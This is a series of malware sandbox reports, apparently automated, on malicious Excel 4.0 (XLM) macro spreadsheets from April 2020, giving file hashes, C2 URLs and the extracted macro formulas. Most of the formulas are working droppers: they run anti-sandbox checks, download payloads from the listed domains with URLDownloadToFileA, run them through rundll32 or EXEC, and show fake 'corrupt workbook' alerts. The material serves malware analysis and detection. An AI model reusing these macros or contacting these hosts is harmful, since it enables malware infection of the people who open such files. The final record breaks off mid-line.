{"version":"0.2","sample":{"sample":"","kind":"file","target":"a5274eda01541dab6e29733deef4b04fc4e12dbe5507474113c76e4f4b2d146e"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a5274eda01541dab6e29733deef4b04fc4e12dbe5507474113c76e4f4b2d146e","filesize":167936,"md5":"7aaecdc3ad694ac08188c82778491cf1","sha1":"86dd335e9b2ad534f1bc77055a832326014cb7cb","sha256":"a5274eda01541dab6e29733deef4b04fc4e12dbe5507474113c76e4f4b2d146e","sha512":"3a1c5949654870c9f78d39630b9d0ac03fe2a2f5c6a97d280a47c3387b38d04ba30edd74a464e61be8637a7fa94a110a3baddb3b363bf58d5cde02fd47a2a7d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a5274eda01541dab6e29733deef4b04fc4e12dbe5507474113c76e4f4b2d146e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oR1DfpXp7K\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a527c368f97edbf91208209fad0cf97f7da51cf313149b5e4f1c6c82598b2468"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a527c368f97edbf91208209fad0cf97f7da51cf313149b5e4f1c6c82598b2468","filesize":113152,"md5":"776ab30149da0c45f307e8c6454a5ca1","sha1":"7575ae90d236487aa8946d8d513ec8b666147da7","sha256":"a527c368f97edbf91208209fad0cf97f7da51cf313149b5e4f1c6c82598b2468","sha512":"75926ff354763e025a86daa784f8dd5e14fbcde859e88796253d9993c5a99224fdbc97cdab3b536bb1d983ef708733d5b56a03b9373298ce9e7b944794ccc848","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a527c368f97edbf91208209fad0cf97f7da51cf313149b5e4f1c6c82598b2468.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/vdjfvfs7871f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"k36yzMZw8g\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a52f95b05aa093a699189d412819b5dd1de9cdea9801afe9dfd4434e21141f4f"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a52f95b05aa093a699189d412819b5dd1de9cdea9801afe9dfd4434e21141f4f","filesize":209920,"md5":"7ccd03d92d48f81e21daa9aa160dadfb","sha1":"edc003201321234200f458a4e369ddce1f311539","sha256":"a52f95b05aa093a699189d412819b5dd1de9cdea9801afe9dfd4434e21141f4f","sha512":"64209a1a7eb8d30b9ab2bc07e1fd877a420adb7266a2ba22a79caec1b2cd4ddb7adbbc528eda918a9eb523a6a00b57da7714bc6c44f2eb84a5b0e7f132f0f864","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a52f95b05aa093a699189d412819b5dd1de9cdea9801afe9dfd4434e21141f4f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0gydhhySzn\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a531556bd5386058ff67a2bf97568f38bd6c90fe7729026ce6fc7ae802bd744e"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a531556bd5386058ff67a2bf97568f38bd6c90fe7729026ce6fc7ae802bd744e","filesize":196096,"md5":"2a5e29c298c3af91791eb85efaaf3560","sha1":"0048acb2775f5f6dcc99e43e44f0757f9e6a035e","sha256":"a531556bd5386058ff67a2bf97568f38bd6c90fe7729026ce6fc7ae802bd744e","sha512":"60cc8e7fcaa79f4f13a205c556175705d69e934e27cfa01b92c2f9f4dddd8187d862ce8ab792d1cd920fca506311d9670b4592258f96e842350279f2d44b63e0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a531556bd5386058ff67a2bf97568f38bd6c90fe7729026ce6fc7ae802bd744e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nFOPEN(\"C:\\Users\\Public\\2.vbs\",3)\nMESSAGE(TRUE,\"One moment please...\")\nIF(GET.WORKSPACE(42),EXEC(GET.NOTE(R$34C$3)),CLOSE(TRUE))\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$36C$3)),)\nCLOSE(TRUE)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a537754b57d9b3604b40cd950eeceb9e34f900b4cb46d388d1328c32425e2751"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a537754b57d9b3604b40cd950eeceb9e34f900b4cb46d388d1328c32425e2751","filesize":185344,"md5":"2f0c771fbdc6ab0bc4bdbd8d7917c366","sha1":"689494a179b9627b586cbd8ac519a4b654167762","sha256":"a537754b57d9b3604b40cd950eeceb9e34f900b4cb46d388d1328c32425e2751","sha512":"a49524b1e9573010c324b65993a644ff7b4ba2f8f8bc12dacee63cbbc4d2447f0e75966022df689b51a66ee3ba757f62e58b75e02d24ffb47fbb27b0358a6226","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a537754b57d9b3604b40cd950eeceb9e34f900b4cb46d388d1328c32425e2751.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a545af14d79f2afd442e71027fe61d710fce1879978c0e608976c03f246bc215"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a545af14d79f2afd442e71027fe61d710fce1879978c0e608976c03f246bc215","filesize":167936,"md5":"c8a62d7653e04af29503469c8e17198d","sha1":"82dc6339e28bb00ed38a989a9ea3705c3e7eb521","sha256":"a545af14d79f2afd442e71027fe61d710fce1879978c0e608976c03f246bc215","sha512":"0465b193fd511812fb3005253b7603e08fb47cb1839e26120655b1fe7c845b9470721ac512095b48997cacd305ac242ff7592af7e14d0480d982fd6d1a30e9e7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a545af14d79f2afd442e71027fe61d710fce1879978c0e608976c03f246bc215.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"H0Wgnmb0ma\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a54c699d663126c86715e3f9c3f47e77f7d29aed6b02670ce6d5d09063274b0f"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a54c699d663126c86715e3f9c3f47e77f7d29aed6b02670ce6d5d09063274b0f","filesize":112640,"md5":"d4e7edbc5e66a96bbbe6ada364876b44","sha1":"379bc83ef7f1e366b121a25ad02bc2552eae5f32","sha256":"a54c699d663126c86715e3f9c3f47e77f7d29aed6b02670ce6d5d09063274b0f","sha512":"6f4aa7d136a94d3254d424fc5eb65afb36f0073a939240c12c3afb95c6e333cfa2f464c3d264f5d4d15fdee73e81600bf20ed98517dd1ff935e3020542342029","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a54c699d663126c86715e3f9c3f47e77f7d29aed6b02670ce6d5d09063274b0f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a54f19073719c83f457f352578d928a3c412e7f38d5e53076181226d3c102f85"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a54f19073719c83f457f352578d928a3c412e7f38d5e53076181226d3c102f85","filesize":113664,"md5":"4b867ac9c1af7d022d9eedae3c9aa25d","sha1":"66cf4c9d3b1fc5d47b3320d74dd73f126cd57e44","sha256":"a54f19073719c83f457f352578d928a3c412e7f38d5e53076181226d3c102f85","sha512":"7f72ab5e99f009bee144bd84c2cd3e8b43833a8f6430f592e4984487953beedea1ae85a747fa2c4840c7cb5099a1e9461c9551a9a986e7d5a133c5e20a934ec7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a54f19073719c83f457f352578d928a3c412e7f38d5e53076181226d3c102f85.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"KodhqDnE8b\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a558f0a13a6781194c552bc03c47719e2546a46eda47398d5dc9900e0339a5ff"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a558f0a13a6781194c552bc03c47719e2546a46eda47398d5dc9900e0339a5ff","filesize":112128,"md5":"40442a6a4b8306da222579f5676b8322","sha1":"044efd9a18422d010a07a44ecbb03d0f8e8367a5","sha256":"a558f0a13a6781194c552bc03c47719e2546a46eda47398d5dc9900e0339a5ff","sha512":"c73d4d887cf18cb4d4de22c98734593ad784805cbb9103803ecf622bba6568ab73129e2be0d6b050dada4ea04a57c9695c9f259d64c579feaa3882896af14db3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a558f0a13a6781194c552bc03c47719e2546a46eda47398d5dc9900e0339a5ff.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a572a718ba6515771d4a2482466331dbdfb301d2de681d26dd31897a2bea8003"},"analysis":{"reported":"2020-04-09T16:18:07Z","score":10},"files":[{"filename":"a572a718ba6515771d4a2482466331dbdfb301d2de681d26dd31897a2bea8003","filesize":177152,"md5":"c653e78b29daf2525eb8b9ed917f303c","sha1":"908afc5d40286a1c0353b6569868bf266f215964","sha256":"a572a718ba6515771d4a2482466331dbdfb301d2de681d26dd31897a2bea8003","sha512":"a7a512eb55edc9f42b6d248b6dfe9b0a717ae6f9cb899efa0d92612b0534b09ef0818d98d24ceec0f463cf62f51c8b4b4ed83d258f3dd8b60d305abc577e801b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a572a718ba6515771d4a2482466331dbdfb301d2de681d26dd31897a2bea8003.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cWWdtypK4i\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a59dea30e63136aab7f655db68583497ac577ff237c0d4be25dcedbb0aa70506"},"analysis":{"reported":"2020-04-09T16:18:08Z","score":10},"files":[{"filename":"a59dea30e63136aab7f655db68583497ac577ff237c0d4be25dcedbb0aa70506","filesize":185344,"md5":"efd6ee3d39272da43740f44cb6c38805","sha1":"602be80784ef44099b44df4a7f8c93b4bd828db4","sha256":"a59dea30e63136aab7f655db68583497ac577ff237c0d4be25dcedbb0aa70506","sha512":"115fce59b9911d88e0dd2ac1d9c5d8316885ed6322b04047caea76a750f87e347298899bcc250649772f163057e4afcceb1b262edf0ebc28c4f16689dc0a10c7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a59dea30e63136aab7f655db68583497ac577ff237c0d4be25dcedbb0aa70506.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a5b59fdaf652040bbbedf543c55df923ff8b06110f9a3d83a7490690679276aa"},"analysis":{"reported":"2020-04-09T16:18:08Z","score":10},"files":[{"filename":"a5b59fdaf652040bbbedf543c55df923ff8b06110f9a3d83a7490690679276aa","filesize":144384,"md5":"dd4a2aa973f1515a51f7746e4ea73b44","sha1":"ddbe2ee0b4bf90a0245a1cf0166ec0316a2370a8","sha256":"a5b59fdaf652040bbbedf543c55df923ff8b06110f9a3d83a7490690679276aa","sha512":"2c1c8d53a94eb8a28e2c3790cb179f0ca27ef644804c48ac2d0c3431a14c8e4f01e468d41fde7505ec71da56b2717109a15a2e85ecd2b7beaf1f3e4bc97c06d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a5b59fdaf652040bbbedf543c55df923ff8b06110f9a3d83a7490690679276aa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"GNLSnrpfoD\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a5c0d6d9e9cc75548c8526df20f4453f4fab7600b2cf756b873fb96163f61b84"},"analysis":{"reported":"2020-04-09T16:18:08Z","score":10},"files":[{"filename":"a5c0d6d9e9cc75548c8526df20f4453f4fab7600b2cf756b873fb96163f61b84","filesize":209920,"md5":"18e6debf8e6aba1707a1303a5e461400","sha1":"51a5aef844d68fe87a84caca916d0f1d2c18fdc0","sha256":"a5c0d6d9e9cc75548c8526df20f4453f4fab7600b2cf756b873fb96163f61b84","sha512":"b76cba95b9862204d126eba2177666d273c80f3f5d57e25c95d9ee0bab8d253459d7d62e8b865794e1f2902e9c6d0c6caf1009fbfd736e3b78b31e8aefacd04d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a5c0d6d9e9cc75548c8526df20f4453f4fab7600b2cf756b873fb96163f61b84.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sL3XxfZjPZ\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a5e44c7d15934bcacc9238f07887c6ea5fd9f74c9d5f03d0c488e17b5b8c11fb"},"analysis":{"reported":"2020-04-09T16:18:08Z","score":10},"files":[{"filename":"a5e44c7d15934bcacc9238f07887c6ea5fd9f74c9d5f03d0c488e17b5b8c11fb","filesize":160768,"md5":"83f59d80fccc51d0b8554d1a2a9991e3","sha1":"1e2fec5f8e22ccab1634c17acd40b9cca935e53d","sha256":"a5e44c7d15934bcacc9238f07887c6ea5fd9f74c9d5f03d0c488e17b5b8c11fb","sha512":"2a45a3b4739be3177afd0a2ec5ff84d0359dc92770c37f51e6e2bdff89cd49dfe2e89bd67f875930a7408979ff7e8309acbc9b96eefd25f1e69384580bdbefb8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a5e44c7d15934bcacc9238f07887c6ea5fd9f74c9d5f03d0c488e17b5b8c11fb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"F3CeYTlKzO\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a5f81dc9636db2e109c9ca6c38f2781b52e045a3214a87b26facb5f226d6057d"},"analysis":{"reported":"2020-04-09T16:18:08Z","score":10},"files":[{"filename":"a5f81dc9636db2e109c9ca6c38f2781b52e045a3214a87b26facb5f226d6057d","filesize":185344,"md5":"33683ebb9ad212ad3deee72766271b17","sha1":"973e055507bb559f34f55602dd302f2ddb76c8d9","sha256":"a5f81dc9636db2e109c9ca6c38f2781b52e045a3214a87b26facb5f226d6057d","sha512":"877f2cef1cfe2a1af53825c43130fd80921424399375fc2354edb921d46ff8408c4a6c0d1bd4539d9f5031625890d96607a37f335b347a169134a2159742b773","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a5f81dc9636db2e109c9ca6c38f2781b52e045a3214a87b26facb5f226d6057d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a60258b1acf2f793659bb0a22fc4d6a564c051097d501a8c825b5742696948cf"},"analysis":{"reported":"2020-04-09T16:18:08Z","score":10},"files":[{"filename":"a60258b1acf2f793659bb0a22fc4d6a564c051097d501a8c825b5742696948cf","filesize":167936,"md5":"8d5b8823677c5386781eb85eced1bab3","sha1":"31a559a00fc6d88c67d803bdb36b004869e47660","sha256":"a60258b1acf2f793659bb0a22fc4d6a564c051097d501a8c825b5742696948cf","sha512":"0398d2622b682828ac960c4333a8f53921a573248df1fc48e26d0017935f9b362e56e4b7ea294533e570f3280309476867ba0149125191456a1e4d3bead49b6a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a60258b1acf2f793659bb0a22fc4d6a564c051097d501a8c825b5742696948cf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5wOufS27m2\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a608e0ce485fa694f7c453c3a5134b19235378ee208eaf7c666589422bdb28c4"},"analysis":{"reported":"2020-04-09T16:18:08Z","score":10},"files":[{"filename":"a608e0ce485fa694f7c453c3a5134b19235378ee208eaf7c666589422bdb28c4","filesize":141312,"md5":"12e97d1b6efa09ac97bb7999f2e548e9","sha1":"d6fc15ce2f0432271ee1f578e76978ffc6315b0c","sha256":"a608e0ce485fa694f7c453c3a5134b19235378ee208eaf7c666589422bdb28c4","sha512":"b3f6631273cbd16f4b670eb86f01131eb9e6c593fedd7cca0fd2920f316ca5fcaa13e18497da21a27bd5d4459407cafcc72b0ea437b3792683679c8754fcfa2b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a608e0ce485fa694f7c453c3a5134b19235378ee208eaf7c666589422bdb28c4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM 